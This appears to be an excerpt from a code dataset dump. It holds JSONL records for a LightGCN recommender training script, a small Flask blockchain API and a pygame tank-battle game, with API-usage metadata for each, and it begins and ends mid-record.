"line_number": 36, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 56, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 79, "usage_type": "call"}, {"api_name": "tweepy.error.RateLimitError", "line_number": 101, "usage_type": "attribute"}, {"api_name": "tweepy.error", "line_number": 101, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 109, "usage_type": "call"}, {"api_name": "tweepy.error.TweepError", "line_number": 113, "usage_type": "attribute"}, {"api_name": "tweepy.error", "line_number": 113, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 115, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "attribute"}, {"api_name": "pandas.read_excel", "line_number": 136, "usage_type": "call"}]} +{"seq_id": "9412913603", "text": "import world\nimport utils\nfrom world import cprint\nimport torch\nimport numpy as np\nfrom tensorboardX import SummaryWriter\nimport time\nimport Procedure\nfrom os.path import join\nfrom ckpt import State\n# ==============================\nutils.set_seed(world.seed)\nprint(\">>SEED:\", world.seed)\n# ==============================\nimport register\nfrom register import dataset\n\nRecmodel = register.MODELS[world.model_name](world.config, dataset)\nRecmodel = Recmodel.to(world.device)\nbpr = utils.BPRLoss(Recmodel, world.config)\n\n# ====================== our changes ======================\nweight_file = utils.getFileName()\nprint(f\"load and save to {weight_file}\")\nstate = State(bpr.model, bpr.opt, weight_file)\n# ====================== our changes ======================\n\nif world.LOAD:\n try:\n state.load(world.device)\n # Recmodel.load_state_dict(torch.load(weight_file, map_location=world.device))\n world.cprint(f\"loaded model weights from {weight_file}\")\n except FileNotFoundError:\n print(f\"{weight_file} not exists, start from beginning\")\nNeg_k = 1\n\n# init tensorboard\nif world.tensorboard:\n w : SummaryWriter = SummaryWriter(\n join(world.BOARD_PATH, time.strftime(\"%m-%d-%Hh%Mm%Ss-\") + \"-\" + world.comment)\n )\nelse:\n w = None\n world.cprint(\"not enable tensorflowboard\")\n\ntry:\n # roughly correct, haven't consider in detail\n start_epoch = state.epoch + 1\n\n S = utils.UniformSample_original(dataset)\n users = torch.Tensor(S[:, 0]).long()\n posItems = torch.Tensor(S[:, 1]).long()\n negItems = torch.Tensor(S[:, 2]).long()\n steps_per_epoch = 0\n for i in utils.minibatch(users,\n posItems,\n negItems,\n batch_size=world.config['bpr_batch_size']):\n steps_per_epoch += 1\n lr_scheduler = torch.optim.lr_scheduler.OneCycleLR(bpr.opt, max_lr=world.config['lr'], epochs=world.TRAIN_epochs, steps_per_epoch=steps_per_epoch, last_epoch=start_epoch*steps_per_epoch-1, cycle_momentum=False)\n for epoch in range(start_epoch, start_epoch+world.TRAIN_epochs):\n start = time.time()\n if epoch % 5 == 0:\n cprint(\"[TEST]\")\n results = Procedure.Test(dataset, Recmodel, epoch, w, world.config['multicore'])\n state.epoch = epoch-1\n state.save(results['ndcg'][0])\n output_information = Procedure.BPR_train_original(dataset, Recmodel, bpr, epoch, lr_scheduler, neg_k=Neg_k,w=w)\n print(f'EPOCH[{epoch+1}/{world.TRAIN_epochs}] {output_information}')\nfinally:\n if world.tensorboard:\n w.close()", "repo_name": "zoryzhang/4222project", "sub_path": "LightGCN2/code/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2654, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", 
"api": [{"api_name": "utils.set_seed", "line_number": 12, "usage_type": "call"}, {"api_name": "world.seed", "line_number": 12, "usage_type": "attribute"}, {"api_name": "world.seed", "line_number": 13, "usage_type": "attribute"}, {"api_name": "register.dataset", "line_number": 18, "usage_type": "argument"}, {"api_name": "register.MODELS", "line_number": 18, "usage_type": "attribute"}, {"api_name": "world.model_name", "line_number": 18, "usage_type": "attribute"}, {"api_name": "world.config", "line_number": 18, "usage_type": "attribute"}, {"api_name": "world.device", "line_number": 19, "usage_type": "attribute"}, {"api_name": "utils.BPRLoss", "line_number": 20, "usage_type": "call"}, {"api_name": "world.config", "line_number": 20, "usage_type": "attribute"}, {"api_name": "utils.getFileName", "line_number": 23, "usage_type": "call"}, {"api_name": "ckpt.State", "line_number": 25, "usage_type": "call"}, {"api_name": "world.LOAD", "line_number": 28, "usage_type": "attribute"}, {"api_name": "world.device", "line_number": 30, "usage_type": "attribute"}, {"api_name": "world.cprint", "line_number": 32, "usage_type": "call"}, {"api_name": "world.tensorboard", "line_number": 38, "usage_type": "attribute"}, {"api_name": "tensorboardX.SummaryWriter", "line_number": 39, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 40, "usage_type": "call"}, {"api_name": "world.BOARD_PATH", "line_number": 40, "usage_type": "attribute"}, {"api_name": "time.strftime", "line_number": 40, "usage_type": "call"}, {"api_name": "world.comment", "line_number": 40, "usage_type": "attribute"}, {"api_name": "world.cprint", "line_number": 44, "usage_type": "call"}, {"api_name": "utils.UniformSample_original", "line_number": 50, "usage_type": "call"}, {"api_name": "register.dataset", "line_number": 50, "usage_type": "argument"}, {"api_name": "torch.Tensor", "line_number": 51, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 52, "usage_type": "call"}, {"api_name": "torch.Tensor", "line_number": 53, "usage_type": "call"}, {"api_name": "utils.minibatch", "line_number": 55, "usage_type": "call"}, {"api_name": "world.config", "line_number": 58, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.OneCycleLR", "line_number": 60, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 60, "usage_type": "attribute"}, {"api_name": "world.config", "line_number": 60, "usage_type": "attribute"}, {"api_name": "world.TRAIN_epochs", "line_number": 60, "usage_type": "attribute"}, {"api_name": "world.TRAIN_epochs", "line_number": 61, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 62, "usage_type": "call"}, {"api_name": "world.cprint", "line_number": 64, "usage_type": "call"}, {"api_name": "Procedure.Test", "line_number": 65, "usage_type": "call"}, {"api_name": "register.dataset", "line_number": 65, "usage_type": "argument"}, {"api_name": "world.config", "line_number": 65, "usage_type": "attribute"}, {"api_name": "Procedure.BPR_train_original", "line_number": 68, "usage_type": "call"}, {"api_name": "register.dataset", "line_number": 68, "usage_type": "argument"}, {"api_name": "world.TRAIN_epochs", "line_number": 69, "usage_type": "attribute"}, {"api_name": "world.tensorboard", "line_number": 71, "usage_type": "attribute"}]} +{"seq_id": "71202482683", "text": "from flask import Flask, jsonify\n\nfrom blockchain import Blockchain\n\n\n# create blockchain\nblockchain = Blockchain()\n\n# create web app\napp = Flask(__name__)\n#app.config['JSONIFY_PRETTYPRINT_REGULAR'] = 
False\n\n@app.route('/mine_block', methods=['GET'])\ndef mine_block():\n prev_block = blockchain.get_prev_block()\n prev_proof = prev_block['proof']\n proof = blockchain.pow(prev_proof)\n prev_hash = blockchain.hash(prev_block)\n block = blockchain.create_block(proof, prev_hash)\n response = {'message': 'Just mined a block',\n 'index': block['index'],\n 'timestamp': block['timestamp'],\n 'proof': block['proof'],\n 'prev_hash': block['prev_hash']}\n return jsonify(response), 200\n \n \n@app.route('/get_chain', methods=['GET'])\ndef get_chain():\n response = {'chain': blockchain.chain,\n 'chain_length': len(blockchain.chain)}\n return jsonify(response), 200\n\n\ndef main():\n app.run(host='0.0.0.0', port=5000)\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "jpbacher/blockchain", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 1039, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "blockchain.Blockchain", "line_number": 7, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 10, "usage_type": "call"}, {"api_name": "blockchain.get_prev_block", "line_number": 15, "usage_type": "call"}, {"api_name": "blockchain.pow", "line_number": 17, "usage_type": "call"}, {"api_name": "blockchain.hash", "line_number": 18, "usage_type": "call"}, {"api_name": "blockchain.create_block", "line_number": 19, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 25, "usage_type": "call"}, {"api_name": "blockchain.chain", "line_number": 30, "usage_type": "attribute"}, {"api_name": "blockchain.chain", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 32, "usage_type": "call"}]} +{"seq_id": "40130757977", "text": "# -*- coding: utf-8 -*-\nimport enemyTank\nimport food\nimport myTank\nimport os\nimport sys\nimport time\nimport traceback\nimport pygame\nimport wall\nimport wall2\n\n\ndef main(ige, lev):\n # pygame 初始化\n pygame.init()\n pygame.mixer.init()\n\n # 視窗基礎設定\n resolution = (630, 630)\n screen = pygame.display.set_mode(resolution)\n pygame.display.set_caption(\" Tank War! 
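A hypothetical client for the two blockchain endpoints above (assumes the Flask app from that record is running locally on port 5000, as in its main()):

import requests

block = requests.get('http://localhost:5000/mine_block').json()
chain = requests.get('http://localhost:5000/get_chain').json()
print(block['index'], chain['chain_length'])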
\", 'middle')\n\n # 復活次數展示圖\n player_img = pygame.image.load(os.path.join(\n \"image\", \"tank_T1_0.png\")).subsurface((0, 0), (48, 48)).convert()\n player_mini_img = pygame.transform.scale(player_img, (25, 19))\n\n # 放入背景圖片、音樂、音效、特效\n background_image = pygame.image.load(\n os.path.join(\"image\", ige))\n\n home_image = pygame.image.load(os.path.join(\"image\", \"home.png\"))\n home_destroyed_image = pygame.image.load(\n os.path.join(\"image\", \"home_destroyed.png\"))\n\n def draw_health(surf, hp, x, y):\n if hp < 0:\n hp = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 10\n fill = (hp/100)*BAR_LENGTH\n outline_rect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n pygame.draw.rect(surf, GREEN, fill_rect)\n pygame.draw.rect(surf, WHITE, outline_rect, 2)\n\n class Base(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((100, 150))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.center = (WIDTH/2, 630)\n self.health = 100\n\n all_sprites = pygame.sprite.Group()\n base = Base()\n all_sprites.add(base)\n\n expl_anim = {}\n expl_anim['enemy_tank'] = []\n expl_anim['my_tank'] = []\n for i in range(9):\n expl_img = pygame.image.load(\n os.path.join(\"image\", f\"expl{i}.png\")).convert()\n expl_img.set_colorkey((0, 0, 0))\n expl_anim['enemy_tank'].append(\n pygame.transform.scale(expl_img, (48, 48)))\n expl_anim['my_tank'].append(pygame.transform.scale(expl_img, (48, 48)))\n player_expl_img = pygame.image.load(\n os.path.join(\"image\", f\"player_expl{i}.png\")).convert()\n player_expl_img.set_colorkey((0, 0, 0))\n bang_sound = pygame.mixer.Sound(os.path.join(\"music\", \"bang.wav\"))\n bang_sound.set_volume(1)\n fire_sound = pygame.mixer.Sound(os.path.join(\"music\", \"fire.wav\"))\n start_sound = pygame.mixer.Sound(os.path.join(\"music\", \"start.wav\"))\n start_sound.play()\n\n # 定義精靈組\n allTankGroup = pygame.sprite.Group() # 所有坦克\n mytankGroup = pygame.sprite.Group() # 我方坦克\n allEnemyGroup = pygame.sprite.Group() # 所有敵方坦克\n redEnemyGroup = pygame.sprite.Group() # 敵方紅色坦克\n greenEnemyGroup = pygame.sprite.Group() # 敵方綠色坦克\n otherEnemyGroup = pygame.sprite.Group() # 敵方其他坦克\n enemyBulletGroup = pygame.sprite.Group() # 敵方子彈\n explosionList = [] # 儲存爆炸\n\n # 創建生命顯示圖\n def draw_life(surf, lives, img, x, y):\n for i in range(lives):\n img_rect = img.get_rect()\n img_rect.x = x + 32*i\n img_rect.y = y\n surf.blit(img, img_rect)\n\n # 爆炸動畫\n class Explosion(pygame.sprite.Sprite):\n def __init__(self, center, tank_ca):\n pygame.sprite.Sprite.__init__(self)\n self.tank_ca = tank_ca\n self.image = expl_anim[self.tank_ca][0]\n self.rect = self.image.get_rect()\n self.rect.center = center\n self.frame = 0\n self.last_update = pygame.time.get_ticks()\n self.frame_rate = 50\n self.Life = True\n\n def update(self):\n now = pygame.time.get_ticks()\n if now - self.last_update > self.frame_rate:\n self.last_update = now\n self.frame += 1\n if self.frame == len(expl_anim[self.tank_ca]): # 動畫到最後一張\n self.Life = False\n else:\n self.image = expl_anim[self.tank_ca][self.frame]\n center = self.rect.center\n self.rect = self.image.get_rect()\n self.rect.center = center\n\n def displayExplode(self):\n screen.blit(self.image, self.rect)\n\n # 玩家復活時暫時隱藏玩家坦克\n def hide(self):\n self.hidden = True\n self.hide_time = pygame.time.get_ticks()\n self.rect.center = (3 + 24 * 8, 3 + 24 * 24)\n\n # 創建地圖\n if lev == 1:\n bgMap = wall.Map()\n elif lev == 2:\n bgMap = wall2.Map()\n\n # 創建食物/道具 但不顯示\n prop = 
food.Food()\n\n # 創建我方坦克\n myTank_T1 = myTank.MyTank(1)\n allTankGroup.add(myTank_T1)\n mytankGroup.add(myTank_T1)\n\n # 創建敵方坦克\n for i in range(1, 5):\n enemy = enemyTank.EnemyTank(i)\n allTankGroup.add(enemy)\n allEnemyGroup.add(enemy)\n if enemy.isred == True:\n redEnemyGroup.add(enemy)\n continue\n elif enemy.isgreen == True:\n greenEnemyGroup.add(enemy)\n continue\n else:\n otherEnemyGroup.add(enemy)\n\n # 敵方坦克出現動畫\n appearance_image = pygame.image.load(\n os.path.join(\"image\", \"appear.png\")).convert_alpha()\n appearance = []\n appearance.append(appearance_image.subsurface((0, 0), (48, 48)))\n appearance.append(appearance_image.subsurface((48, 0), (48, 48)))\n appearance.append(appearance_image.subsurface((96, 0), (48, 48)))\n\n # 自定義事件\n # 創建敵方坦克延遲200\n DELAYEVENT = pygame.constants.USEREVENT\n pygame.time.set_timer(DELAYEVENT, 200)\n # 創建 敵方子彈延遲1000\n ENEMYBULLETNOTCOOLINGEVENT = pygame.constants.USEREVENT + 1\n pygame.time.set_timer(ENEMYBULLETNOTCOOLINGEVENT, 1000)\n # 創建 我方子彈延遲200\n MYBULLETNOTCOOLINGEVENT = pygame.constants.USEREVENT + 2\n pygame.time.set_timer(MYBULLETNOTCOOLINGEVENT, 200)\n # 敵方坦克 靜止8000\n NOTMOVEEVENT = pygame.constants.USEREVENT + 3\n pygame.time.set_timer(NOTMOVEEVENT, 8000)\n\n delay = 100\n moving = 0\n movdir = 0\n enemyNumber = 4\n enemyCouldMove = True\n switch_R1_R2_image = True\n homeSurvive = True\n running_T1 = True\n running = True\n clock = pygame.time.Clock()\n\n while running:\n # 畫背景\n screen.blit(background_image, (0, 0))\n # 畫磚頭\n for each in bgMap.brickGroup:\n screen.blit(each.image, each.rect)\n # 畫石頭\n for each in bgMap.ironGroup:\n screen.blit(each.image, each.rect)\n # 畫大本營\n if homeSurvive:\n screen.blit(home_image, (3 + 12 * 24, 3 + 24 * 24))\n else:\n screen.blit(home_destroyed_image, (3 + 12 * 24, 3 + 24 * 24))\n # 畫生命\n draw_life(screen, myTank_T1.life, player_mini_img, 0, 12)\n # 畫大本營血條\n draw_health(screen, base.health, 520, 15)\n\n # 畫爆炸\n for explode in explosionList:\n if explode.Life:\n explode.displayExplode()\n explode.update()\n else:\n explosionList.remove(explode)\n\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n\n # 我方子彈冷卻事件\n if event.type == MYBULLETNOTCOOLINGEVENT:\n myTank_T1.bulletNotCooling = True\n\n # 敵方子彈冷卻事件\n if event.type == ENEMYBULLETNOTCOOLINGEVENT:\n for each in allEnemyGroup:\n each.bulletNotCooling = True\n\n # 敵方坦克靜止事件\n if event.type == NOTMOVEEVENT:\n enemyCouldMove = True\n\n # 創建敵方坦克延遲\n if event.type == DELAYEVENT:\n if enemyNumber <= 4:\n if enemy.isred == True:\n redEnemyGroup.add(enemy)\n elif enemy.isgreen == True:\n greenEnemyGroup.add(enemy)\n else:\n otherEnemyGroup.add(enemy)\n\n if event.type == pygame.KEYDOWN: # 按下x 退出遊戲\n if event.key == pygame.K_x:\n pygame.quit()\n sys.exit()\n\n # 檢查玩家鍵盤操作\n key_pressed = pygame.key.get_pressed()\n\n # 玩家一的移動操作\n if moving:\n moving -= 1\n if movdir == 0:\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveUp(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving += 1\n allTankGroup.add(myTank_T1)\n running_T1 = True\n if movdir == 1:\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveDown(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving += 1\n allTankGroup.add(myTank_T1)\n running_T1 = True\n if movdir == 2:\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveLeft(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving += 1\n allTankGroup.add(myTank_T1)\n running_T1 = True\n if movdir == 3:\n 
allTankGroup.remove(myTank_T1)\n if myTank_T1.moveRight(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving += 1\n allTankGroup.add(myTank_T1)\n running_T1 = True\n\n if not moving:\n if key_pressed[pygame.K_UP]: # 上鍵向上移動\n moving = 7\n movdir = 0\n running_T1 = True\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveUp(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving = 0\n allTankGroup.add(myTank_T1)\n elif key_pressed[pygame.K_DOWN]: # 下鍵向下移動\n moving = 7\n movdir = 1\n running_T1 = True\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveDown(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving = 0\n allTankGroup.add(myTank_T1)\n elif key_pressed[pygame.K_LEFT]: # 左鍵向左移動\n moving = 7\n movdir = 2\n running_T1 = True\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveLeft(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving = 0\n allTankGroup.add(myTank_T1)\n elif key_pressed[pygame.K_RIGHT]: # 右鍵向右移動\n moving = 7\n movdir = 3\n running_T1 = True\n allTankGroup.remove(myTank_T1)\n if myTank_T1.moveRight(allTankGroup, bgMap.brickGroup, bgMap.ironGroup, bgMap.all_sprites):\n moving = 0\n allTankGroup.add(myTank_T1)\n # 射擊\n if key_pressed[pygame.K_SPACE]: # 空白鍵射擊\n if not myTank_T1.bullet.life and myTank_T1.bulletNotCooling:\n fire_sound.play()\n myTank_T1.shoot()\n myTank_T1.bulletNotCooling = False\n\n # 畫我方坦克\n if not (delay % 5):\n switch_R1_R2_image = not switch_R1_R2_image\n if switch_R1_R2_image and running_T1:\n screen.blit(myTank_T1.tank_R0,\n (myTank_T1.rect.left, myTank_T1.rect.top))\n running_T1 = False\n else:\n screen.blit(myTank_T1.tank_R1,\n (myTank_T1.rect.left, myTank_T1.rect.top))\n\n # 畫敵方坦克\n for each in allEnemyGroup:\n # 判斷特效是否播放\n if each.flash:\n # 判斷畫左動作還是右動作\n if switch_R1_R2_image:\n screen.blit(each.tank_R0, (each.rect.left, each.rect.top))\n if enemyCouldMove:\n allTankGroup.remove(each)\n each.move(allTankGroup, bgMap.brickGroup,\n bgMap.ironGroup, all_sprites)\n allTankGroup.add(each)\n else:\n screen.blit(each.tank_R1, (each.rect.left, each.rect.top))\n if enemyCouldMove:\n allTankGroup.remove(each)\n each.move(allTankGroup, bgMap.brickGroup,\n bgMap.ironGroup, all_sprites)\n allTankGroup.add(each)\n else:\n # 播放敵方坦克出場特效\n if each.times > 0:\n each.times -= 1\n if each.times <= 10:\n screen.blit(appearance[2], (3 + each.x * 12 * 15, 3))\n elif each.times <= 20:\n screen.blit(appearance[1], (3 + each.x * 12 * 15, 3))\n elif each.times <= 30:\n screen.blit(appearance[0], (3 + each.x * 12 * 15, 3))\n elif each.times <= 40:\n screen.blit(appearance[2], (3 + each.x * 12 * 15, 3))\n elif each.times <= 50:\n screen.blit(appearance[1], (3 + each.x * 12 * 15, 3))\n elif each.times <= 60:\n screen.blit(appearance[0], (3 + each.x * 12 * 15, 3))\n elif each.times <= 70:\n screen.blit(appearance[2], (3 + each.x * 12 * 15, 3))\n elif each.times <= 80:\n screen.blit(appearance[1], (3 + each.x * 12 * 15, 3))\n elif each.times <= 90:\n screen.blit(appearance[0], (3 + each.x * 12 * 15, 3))\n if each.times == 0:\n each.flash = True\n\n # 繪製我方子彈\n if myTank_T1.bullet.life:\n myTank_T1.bullet.move()\n screen.blit(myTank_T1.bullet.bullet, myTank_T1.bullet.rect)\n\n # 子彈 碰撞子彈\n for each in enemyBulletGroup:\n if each.life:\n if pygame.sprite.collide_rect(myTank_T1.bullet, each):\n myTank_T1.bullet.life = False\n each.life = False\n pygame.sprite.spritecollide(\n myTank_T1.bullet, enemyBulletGroup, True, None)\n\n # 子彈 碰撞敵方坦克\n if pygame.sprite.spritecollide(myTank_T1.bullet, 
redEnemyGroup, False, None):\n prop.change()\n bang_sound.play()\n enemyNumber -= 1\n # hits為發生碰撞的位置列表\n hits = pygame.sprite.spritecollide( # 如果子彈碰到敵方紅色坦克,爆炸動畫\n myTank_T1.bullet, redEnemyGroup, True)\n for hit in hits:\n expl = Explosion(hit.rect.center, 'enemy_tank')\n explosionList.append(expl)\n myTank_T1.bullet.life = False\n if enemyNumber == 0:\n # time.sleep(0.5)\n running = False\n elif pygame.sprite.spritecollide(myTank_T1.bullet, greenEnemyGroup, False, None):\n for each in greenEnemyGroup:\n if pygame.sprite.collide_rect(myTank_T1.bullet, each):\n if each.life == 1:\n bang_sound.play()\n enemyNumber -= 1\n expl = Explosion(each.rect.center, 'enemy_tank')\n each.kill()\n explosionList.append(expl)\n each.life -= 1\n if enemyNumber == 0:\n # time.sleep(0.5)\n running = False\n elif each.life == 2:\n each.life -= 1\n myTank_T1.bullet.life = False\n elif pygame.sprite.spritecollide(myTank_T1.bullet, otherEnemyGroup, False, None):\n bang_sound.play()\n enemyNumber -= 1\n hits = pygame.sprite.spritecollide(\n myTank_T1.bullet, otherEnemyGroup, True)\n for hit in hits:\n expl = Explosion(hit.rect.center, 'enemy_tank')\n explosionList.append(expl)\n myTank_T1.bullet.life = False\n if enemyNumber == 0:\n # time.sleep(0.5)\n running = False\n\n # 子弹 碰撞 brickGroup\n if pygame.sprite.spritecollide(myTank_T1.bullet, bgMap.brickGroup, True, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n\n # 子弹 碰撞 ironGroup\n if myTank_T1.bullet.strong:\n if pygame.sprite.spritecollide(myTank_T1.bullet, bgMap.ironGroup, True, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n else:\n if pygame.sprite.spritecollide(myTank_T1.bullet, bgMap.ironGroup, False, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n\n # 子弹 碰撞 base\n if pygame.sprite.spritecollide(myTank_T1.bullet, bgMap.all_sprites, False, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n\n # 繪製敵人子彈\n for each in allEnemyGroup:\n # 如果子彈没有生命,就賦予子彈生命\n if not each.bullet.life and each.bulletNotCooling and enemyCouldMove:\n enemyBulletGroup.remove(each.bullet)\n each.shoot()\n enemyBulletGroup.add(each.bullet)\n each.bulletNotCooling = False\n # 如果特效播放完畢 並且 子彈存活 則繪製敵方子彈\n if each.flash:\n if each.bullet.life:\n # 如果敵方可以移動\n if enemyCouldMove:\n each.bullet.move()\n screen.blit(each.bullet.bullet, each.bullet.rect)\n\n # 敵方子彈 碰撞 我方坦克\n if pygame.sprite.collide_rect(each.bullet, myTank_T1):\n bang_sound.play()\n myTank_T1.life -= 1\n death_expl = Explosion(\n myTank_T1.rect.center, 'my_tank')\n explosionList.append(death_expl)\n hide(myTank_T1)\n myTank_T1.rect.left, myTank_T1.rect.top = 3 + 8 * 24, 3 + 24 * 24\n each.bullet.life = False\n moving = 0 # 重置移動控制參數\n\n # 子彈 碰撞brickGroup\n if pygame.sprite.spritecollide(each.bullet, bgMap.brickGroup, True, None):\n each.bullet.life = False\n\n # 子彈 碰撞homeGroup\n if pygame.sprite.spritecollide(each.bullet, bgMap.all_sprites, False, None):\n myTank_T1.bullet.life = False\n myTank_T1.bullet.rect.left, myTank_T1.bullet.rect.right = 3 + 12 * 24, 3 + 24 * 24\n hits = pygame.sprite.spritecollide(\n each.bullet, bgMap.all_sprites, False, None)\n for hit in hits:\n base.health -= 20\n if base.health <= 0:\n show_init = True\n all_sprites.update()\n\n # 子彈 碰撞ironGroup\n if each.bullet.strong:\n if 
pygame.sprite.spritecollide(each.bullet, bgMap.ironGroup, True, None):\n each.bullet.life = False\n else:\n if pygame.sprite.spritecollide(each.bullet, bgMap.ironGroup, False, None):\n each.bullet.life = False\n\n # 食物/道具部分\n if prop.life:\n screen.blit(prop.image, prop.rect)\n\n # 我方坦克碰撞 食物/道具\n if pygame.sprite.collide_rect(myTank_T1, prop):\n if prop.kind == 1: # 敵人全毀\n for each in allEnemyGroup:\n if pygame.sprite.spritecollide(each, allEnemyGroup, True, None):\n bang_sound.play()\n enemyNumber -= 1\n prop.life = False\n if prop.kind == 2: # 敵人静止\n enemyCouldMove = False\n prop.life = False\n if prop.kind == 3: # 子弹增强\n myTank_T1.bullet.strong = True\n prop.life = False\n if prop.kind == 4: # 大本營得到保護\n for x, y in [(11, 23), (12, 23), (13, 23), (14, 23), (11, 24), (14, 24), (11, 25), (14, 25)]:\n bgMap.iron = wall.Iron()\n bgMap.iron.rect.left, bgMap.iron.rect.top = 3 + x * 24, 3 + y * 24\n bgMap.ironGroup.add(bgMap.iron)\n prop.life = False\n if prop.kind == 5: # 坦克無敵\n prop.life = False\n pass\n if prop.kind == 6: # 坦克生命+1\n if myTank_T1.life < 3:\n myTank_T1.life += 1\n else:\n myTank_T1.life = 3\n prop.life = False\n\n # 生命歸0,遊戲結束\n if myTank_T1.life == 0:\n running = False\n if base.health == 0:\n running = False\n\n # 延遲\n delay -= 1\n if not delay:\n delay = 100\n\n pygame.display.flip()\n clock.tick(60)\n\n\npygame.init()\nWIDTH = 630\nHEIGHT = 630\nGREEN = (0, 255, 0)\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\nclock = pygame.time.Clock()\npygame.display.set_caption(\"TANK\")\n\nbackground_jpg = pygame.image.load(\n os.path.join(\"image\", \"background_revise.jpg\")).convert()\n\nfont_name = pygame.font.match_font(\"arial\")\n\n\ndef draw_text(surf, text, size, x, y):\n font = pygame.font.Font(font_name, size)\n text_surface = font.render(text, True, WHITE)\n text_rect = text_surface.get_rect()\n text_rect.centerx = x\n text_rect.top = y\n surf.blit(text_surface, text_rect)\n\n\ndef draw_init():\n screen.blit(background_jpg, (0, 0))\n draw_text(screen, \"NTU Tank War\", 64, WIDTH/2, HEIGHT/6)\n draw_text(screen, \"Shoot = Space, Move = Arrow keys\",\n 32, WIDTH/2, HEIGHT/2)\n draw_text(screen, \"Press any button to start\",\n 26, WIDTH/2, HEIGHT*(5/6))\n pygame.display.update()\n wating = True\n while wating:\n clock.tick(FPS)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n elif event.type == pygame.KEYUP:\n wating = False\n\n\ndef draw_health(surf, hp, x, y):\n if hp < 0:\n hp = 0\n BAR_LENGTH = 100\n BAR_HEIGHT = 10\n fill = (hp/100)*BAR_LENGTH\n outline_rect = pygame.Rect(x, y, BAR_LENGTH, BAR_HEIGHT)\n fill_rect = pygame.Rect(x, y, fill, BAR_HEIGHT)\n pygame.draw.rect(surf, GREEN, fill_rect)\n pygame.draw.rect(surf, WHITE, outline_rect, 2)\n\n\nclass Base(pygame.sprite.Sprite):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.image = pygame.Surface((100, 150))\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.center = (WIDTH/2, 630)\n self.health = 100\n\n\nall_sprites = pygame.sprite.Group()\nbase = Base()\nall_sprites.add(base)\n\nFPS = 60\nshow_init = True\n\nif show_init:\n draw_init()\n show_init = False\nclock.tick(FPS)\nfor event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n\nscreen.fill(BLACK)\nscreen.blit(background_jpg, (0, 0))\nall_sprites.draw(screen)\ndraw_health(screen, base.health, 520, 15)\npygame.display.update()\n\nif __name__ == \"__main__\":\n try:\n main(\"map.png\", 1)\n except SystemExit:\n 
pass\n except:\n traceback.print_exc()\n pygame.quit()\n input()\n time.sleep(2)\n try:\n main(\"socialscience_back.png\", 2)\n except SystemExit:\n pass\n except:\n traceback.print_exc()\n pygame.quit()\n input()\npygame.quit()\n", "repo_name": "deankuo/PBC-Final-Project", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 25340, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "pygame.init", "line_number": 16, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pygame.display.set_mode", "line_number": 21, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 21, "usage_type": "attribute"}, {"api_name": "pygame.display.set_caption", "line_number": 22, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 22, "usage_type": "attribute"}, {"api_name": "pygame.image.load", "line_number": 25, 